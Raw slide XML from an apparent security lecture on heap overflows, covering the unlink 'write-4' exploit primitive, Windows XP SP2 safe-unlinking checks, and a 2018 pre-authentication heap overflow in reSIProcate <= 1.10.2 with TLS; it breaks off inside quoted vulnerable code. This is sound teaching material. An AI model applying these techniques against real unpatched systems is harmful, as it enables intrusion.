          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Buffer overflow vulnerabilities: heap memory allocation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="524" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946240" y="1323720"/>
            <a:ext cx="6334560" cy="4735440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:transition>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5" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556280" y="418680"/>
            <a:ext cx="11245320" cy="592920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Heap overflow vulnerabilities: write-4 exploit primitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>(2001)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615240" y="1606680"/>
            <a:ext cx="11246760" cy="4440960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>When freed memory is removed from doubly-linked list:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Exploit primitive”: technique to make a program go in a specific state (an exploit “building block”)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Write-4 primitive”: method to write an address of our choice to an address of our choice</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556280" y="2313720"/>
            <a:ext cx="3988080" cy="2010600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>#define unlink(p, bck, fwd) {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>  bck = p-&gt;bk;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>fwd = p-&gt;fd;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>fwd-&gt;bk = bck;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>bck-&gt;fd = fwd;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>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8" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487080" y="3668040"/>
            <a:ext cx="11217600" cy="742320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="529" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1630080" y="436680"/>
            <a:ext cx="9946800" cy="964080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Heap overflow vulnerabilities: write-4 exploit primitive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>                                                                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> (Phrack magazine, 2001)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="530" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3039120" y="1401120"/>
            <a:ext cx="5702760" cy="4853520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:transition>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1" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1616760" y="587160"/>
            <a:ext cx="11245320" cy="803520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Heap overflow vulnerabilities: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>                            Windows XP SP2 heap verification checks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187280" y="2214000"/>
            <a:ext cx="10353240" cy="4113720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>If the following is true for the doubly-linked list, unlinking a memory chunk is possible:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>write-4-exploit primitive no longer works for these doubly-linked lists</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2968200" y="3337200"/>
            <a:ext cx="6161760" cy="395280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>Entry-&gt;Fd-&gt;Bk == Entry-&gt;Bk-&gt;Fd == Entry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5595480" y="4054680"/>
            <a:ext cx="600120" cy="997920"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="ffffff"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="c2f0ff"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000"/>
          </a:gradFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="007196"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>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5" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1683000" y="410760"/>
            <a:ext cx="11245320" cy="646200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>reSIProcate heap overflow vulnerability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702360" y="2199960"/>
            <a:ext cx="10378440" cy="3139920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>reSIProcate: cross-platform (Linux, Windows, FreeBSD, Mac OS, Android, iPhone, …) open-source SIP stack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Used by CounterPath Bria, Zoiper, 3CX Phone System, Cisco, Logitech, …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Pre-authentication heap overflow vulnerability affecting server (PBX) and client (softphone) software using reSIProcate &lt;= 1.10.2 with TLS enabled</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Discovered in 2018</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>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7" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2486160" y="1515600"/>
            <a:ext cx="7562520" cy="4646880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="8000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>Bool</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>ConnectionBase</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>preparseNewBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="8000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> bytesRead</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/* ... */</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
